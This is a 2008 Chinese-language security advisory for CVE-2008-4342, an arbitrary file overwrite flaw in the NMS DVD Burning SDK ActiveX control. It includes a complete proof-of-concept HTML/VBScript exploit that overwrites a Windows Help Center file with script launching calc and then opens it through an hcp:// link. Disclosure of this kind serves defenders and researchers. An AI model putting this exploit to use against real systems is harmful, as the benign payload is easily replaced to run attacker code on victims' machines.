NMS DVD Burning SDK ActiveX控件任意文件覆盖漏洞
发布日期:2008-09-23
更新日期:2008-09-24
受影响系统:Numedia Soft NMS DVD Burning SDK 1.013C
Impressum CDBurnerXP Pro 4.2.1.976
描述:
BUGTRAQ ID:
31374
CVE(CAN) ID:
CVE-2008-4342
NMS DVD Burning SDK是用于刻录DVD光盘的工具包。
ActiveX版本的NMS DVD Burning SDK所安装的NMSDVDX.DVDEngineX.1(NMSDVDX.dll)控件没有正确地验证对EnableLog()和LogMessage()方式所提供的输入参数,如果用户受骗访问了恶意网站并向上述方式传送了恶意参数的话,就可能覆盖系统上的任意文件。
<*来源:bruiser
链接:
http://secunia.com/advisories/31936/
http://retrogod.altervista.org/9sg_numedia_xpl.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<title> :( </title>
<object classid='clsid:C2FBBB5F-6FF7-4F6B-93A3-7EDB509AA938' id='DVDEngineX' />
</object>
<script language='vbscript'>
DVDEngineX.Initialize True
sLogFileName="C:\\WINDOWS\\PCHEALTH\\HELPCTR\\System\\sysinfo\\msinfo.htm"
bCreateNew=True
DVDEngineX.EnableLog sLogFileName ,bCreateNew
nl=unescape("%0d%0a")
'my garbage ...
sMsg="<HTML>" & _
"<SCRIPT LANGUAGE=VBScript>" & nl & _
"Dim WshShell, oExec" & nl & _
"Set WshShell = CreateObject(""WScript.Shell"")" & nl & _
"Set oExec = WshShell.Exec(""calc"")" & nl & _
"Do While oExec.Status = 0" & nl & _
"WScript.Sleep 100" & nl & _
"Loop" & nl & _
"WScript.Echo oExec.Status" & nl & _
"<" & Chr(47) & "SCRIPT>" & nl & _
"<" & Chr(47) & "HTML>"
DVDEngineX.LogMessage sMsg
window.location = "hcp://system/sysinfo/msinfo.htm"
</script>
</html>
建议:
厂商补丁:
Numedia Soft
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.nugroovz.com/Default.aspx浏览次数:2440
严重程度:0(网友投票)